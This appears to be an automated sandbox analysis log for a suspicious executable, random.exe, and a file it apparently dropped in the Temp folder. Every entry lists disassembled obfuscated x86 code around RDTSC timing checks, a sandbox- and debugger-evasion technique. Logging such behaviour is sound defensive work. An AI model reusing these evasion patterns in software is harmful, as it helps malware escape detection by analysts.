Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BE08C0 second address: 4BE0932 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F1244Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F5FF4F12456h 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007F5FF4F12451h 0x00000016 pushfd 0x00000017 jmp 00007F5FF4F12450h 0x0000001c or cl, 00000048h 0x0000001f jmp 00007F5FF4F1244Bh 0x00000024 popfd 0x00000025 popad 0x00000026 nop 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F5FF4F12455h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BE0932 second address: 4BE0959 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFF001h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5FF4AFEFFDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BE0959 second address: 4BE095F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BE09EB second address: 4BD0043 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov eax, esi 0x0000000a jmp 00007F5FF4AFF003h 0x0000000f pop esi 0x00000010 jmp 00007F5FF4AFF006h 0x00000015 leave 0x00000016 pushad 0x00000017 movzx ecx, di 0x0000001a popad 0x0000001b retn 0004h 0x0000001e nop 0x0000001f sub esp, 04h 0x00000022 xor ebx, ebx 0x00000024 cmp eax, 00000000h 0x00000027 je 00007F5FF4AFF1FDh 0x0000002d mov dword ptr [esp], 0000000Dh 0x00000034 call 00007F5FF8EE5171h 0x00000039 mov edi, edi 0x0000003b jmp 00007F5FF4AFF005h 0x00000040 xchg eax, ebp 0x00000041 pushad 0x00000042 push eax 0x00000043 mov ebx, 66589CEEh 0x00000048 pop ebx 0x00000049 mov edi, ecx 0x0000004b popad 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 pushad 0x00000051 popad 0x00000052 call 00007F5FF4AFF008h 0x00000057 pop esi 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD0043 second address: 4BD0083 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F12450h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5FF4F12450h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5FF4F12457h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD0083 second address: 4BD008A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dl 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD008A second address: 4BD00C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 sub esp, 2Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop ecx 0x0000000f pushfd 0x00000010 jmp 00007F5FF4F12455h 0x00000015 adc ecx, 5467E146h 0x0000001b jmp 00007F5FF4F12451h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD00C8 second address: 4BD00E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 mov si, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5FF4AFF001h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD00E8 second address: 4BD010F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F12451h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5FF4F1244Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD010F second address: 4BD0144 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFF001h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F5FF4AFEFFEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5FF4AFEFFEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD0144 second address: 4BD0149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD0149 second address: 4BD017F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FF4AFF007h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5FF4AFF005h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD01FA second address: 4BD0200 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD0200 second address: 4BD0204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD0204 second address: 4BD0245 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F1244Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b inc ebx 0x0000000c pushad 0x0000000d mov bx, si 0x00000010 call 00007F5FF4F12458h 0x00000015 mov esi, 72C87951h 0x0000001a pop esi 0x0000001b popad 0x0000001c test al, al 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 mov ebx, 11DAD9BCh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD0245 second address: 4BD0289 instructions: 0x00000000 rdtsc 0x00000002 mov edi, 7A59D5A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a je 00007F5FF4AFF15Ah 0x00000010 pushad 0x00000011 jmp 00007F5FF4AFF004h 0x00000016 popad 0x00000017 lea ecx, dword ptr [ebp-14h] 0x0000001a jmp 00007F5FF4AFF000h 0x0000001f mov dword ptr [ebp-14h], edi 0x00000022 pushad 0x00000023 mov si, DB4Dh 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD02A5 second address: 4BD02B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movsx edi, si 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD02B5 second address: 4BD02BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD02BC second address: 4BD02C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD02C1 second address: 4BD02DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, 12h 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5FF4AFEFFDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD02DA second address: 4BD02EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FF4F1244Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD03D0 second address: 4BD03E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FF4AFEFFEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD03E2 second address: 4BD040D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F1244Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-2Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5FF4F12455h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD040D second address: 4BD0457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 movzx eax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jmp 00007F5FF4AFF000h 0x00000012 mov dword ptr [esp], esi 0x00000015 jmp 00007F5FF4AFF000h 0x0000001a nop 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F5FF4AFF007h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD0457 second address: 4BD045E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD045E second address: 4BD0475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5FF4AFEFFDh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD0475 second address: 4BD0497 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 jmp 00007F5FF4F12453h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 movzx esi, bx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD0497 second address: 4BD04DC instructions: 0x00000000 rdtsc 0x00000002 movsx edx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ecx, 6EB5F29Fh 0x0000000c popad 0x0000000d xchg eax, ebx 0x0000000e jmp 00007F5FF4AFF002h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F5FF4AFEFFCh 0x0000001d add cx, E938h 0x00000022 jmp 00007F5FF4AFEFFBh 0x00000027 popfd 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD04DC second address: 4BD04F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F1244Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD04F6 second address: 4BD04FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD04FA second address: 4BD0515 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F12457h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD053E second address: 4BD0551 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFEFFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD0551 second address: 4BC0D80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F12459h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b pushad 0x0000000c mov ax, bx 0x0000000f popad 0x00000010 test esi, esi 0x00000012 jmp 00007F5FF4F12455h 0x00000017 je 00007F6065F6050Fh 0x0000001d xor eax, eax 0x0000001f jmp 00007F5FF4EEBB7Ah 0x00000024 pop esi 0x00000025 pop edi 0x00000026 pop ebx 0x00000027 leave 0x00000028 retn 0004h 0x0000002b nop 0x0000002c sub esp, 04h 0x0000002f mov esi, eax 0x00000031 cmp esi, 00000000h 0x00000034 setne al 0x00000037 xor ebx, ebx 0x00000039 test al, 01h 0x0000003b jne 00007F5FF4F12447h 0x0000003d jmp 00007F5FF4F12621h 0x00000042 call 00007F5FF92E9135h 0x00000047 mov edi, edi 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F5FF4F12450h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BC0D80 second address: 4BC0DCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFEFFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F5FF4AFF004h 0x00000011 sbb ax, 5CA8h 0x00000016 jmp 00007F5FF4AFEFFBh 0x0000001b popfd 0x0000001c mov ch, A7h 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F5FF4AFF001h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BC0DCE second address: 4BC0DD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BC0DD4 second address: 4BC0E0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F5FF4AFF000h 0x00000012 jmp 00007F5FF4AFF005h 0x00000017 popfd 0x00000018 movzx esi, bx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BC0E0B second address: 4BC0E4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov si, D6E5h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007F5FF4F12450h 0x00000013 xchg eax, ecx 0x00000014 pushad 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F5FF4F1244Ch 0x0000001c sub ecx, 77854628h 0x00000022 jmp 00007F5FF4F1244Bh 0x00000027 popfd 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BC0E4D second address: 4BC0E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c mov ecx, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BC0E5F second address: 4BC0E79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F1244Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BC0E79 second address: 4BC0E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BC0EAB second address: 4BC0EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, 39E2h 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BC0EB4 second address: 4BC0EBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BC0EBA second address: 4BC0ED2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5FF4F1244Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD091B second address: 4BD0974 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F5FF4AFF004h 0x0000000b pushfd 0x0000000c jmp 00007F5FF4AFF002h 0x00000011 sbb esi, 6C7F0548h 0x00000017 jmp 00007F5FF4AFEFFBh 0x0000001c popfd 0x0000001d pop ecx 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F5FF4AFF005h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD0974 second address: 4BD097A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD097A second address: 4BD097E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD097E second address: 4BD0A1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F5FF4F12455h 0x00000010 adc esi, 3F63B3C6h 0x00000016 jmp 00007F5FF4F12451h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F5FF4F12450h 0x00000022 and cx, 5C68h 0x00000027 jmp 00007F5FF4F1244Bh 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 pushad 0x00000031 mov ecx, 1B98757Bh 0x00000036 pushfd 0x00000037 jmp 00007F5FF4F12450h 0x0000003c adc cx, 2EC8h 0x00000041 jmp 00007F5FF4F1244Bh 0x00000046 popfd 0x00000047 popad 0x00000048 cmp dword ptr [75C7459Ch], 05h 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 movsx edx, si 0x00000055 call 00007F5FF4F1244Ch 0x0000005a pop ecx 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD0AA7 second address: 4BD0AF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFF005h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov cx, 5FF9h 0x00000014 pushfd 0x00000015 jmp 00007F5FF4AFF006h 0x0000001a sbb si, 8D08h 0x0000001f jmp 00007F5FF4AFEFFBh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BD0AF4 second address: 4BD0AFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BE0AA2 second address: 4BE0AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BE0AA8 second address: 4BE0AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BE0AAC second address: 4BE0ADC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFEFFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F5FF4AFF006h 0x00000012 xchg eax, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BE0ADC second address: 4BE0AE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BE0AE0 second address: 4BE0AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BE0AE6 second address: 4BE0B7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4F12454h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F5FF4F12451h 0x00000011 adc al, 00000046h 0x00000014 jmp 00007F5FF4F12451h 0x00000019 popfd 0x0000001a pushfd 0x0000001b jmp 00007F5FF4F12450h 0x00000020 jmp 00007F5FF4F12455h 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, esi 0x00000028 pushad 0x00000029 movzx ecx, bx 0x0000002c movsx edi, si 0x0000002f popad 0x00000030 mov esi, dword ptr [ebp+0Ch] 0x00000033 jmp 00007F5FF4F12450h 0x00000038 test esi, esi 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F5FF4F1244Ah 0x00000043 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BE0B7B second address: 4BE0B81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BE0B81 second address: 4BE0B87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BE0B87 second address: 4BE0C2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F6065B2C81Eh 0x0000000e jmp 00007F5FF4AFF004h 0x00000013 cmp dword ptr [75C7459Ch], 05h 0x0000001a jmp 00007F5FF4AFF000h 0x0000001f je 00007F6065B448CDh 0x00000025 jmp 00007F5FF4AFF000h 0x0000002a xchg eax, esi 0x0000002b pushad 0x0000002c mov esi, 60952FBDh 0x00000031 movzx esi, dx 0x00000034 popad 0x00000035 push eax 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F5FF4AFF002h 0x0000003d sbb si, 12C8h 0x00000042 jmp 00007F5FF4AFEFFBh 0x00000047 popfd 0x00000048 movzx eax, bx 0x0000004b popad 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 movzx esi, dx 0x00000053 jmp 00007F5FF4AFF009h 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BE0C2C second address: 4BE0C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BE0C32 second address: 4BE0C36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4BE0C77 second address: 4BE0C8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FF4F12450h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 131F58E second address: 131F5A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFEFFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F5FF4AFEFF8h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 131F5A4 second address: 131F5A9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 131F5A9 second address: 131F5B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jng 00007F5FF4AFEFFEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 131E538 second address: 131E596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F5FF4F1244Ah 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 jng 00007F5FF4F1249Ah 0x00000016 pushad 0x00000017 jmp 00007F5FF4F12456h 0x0000001c jmp 00007F5FF4F1244Dh 0x00000021 jmp 00007F5FF4F1244Dh 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F5FF4F12454h 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 131E596 second address: 131E59C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 131E7E5 second address: 131E7F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5FF4F1244Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 131E978 second address: 131E995 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FF4AFF007h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	RDTSC instruction interceptor: First address: 131EDD5 second address: 131EDF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FF4F12459h 0x00000009 rdtsc
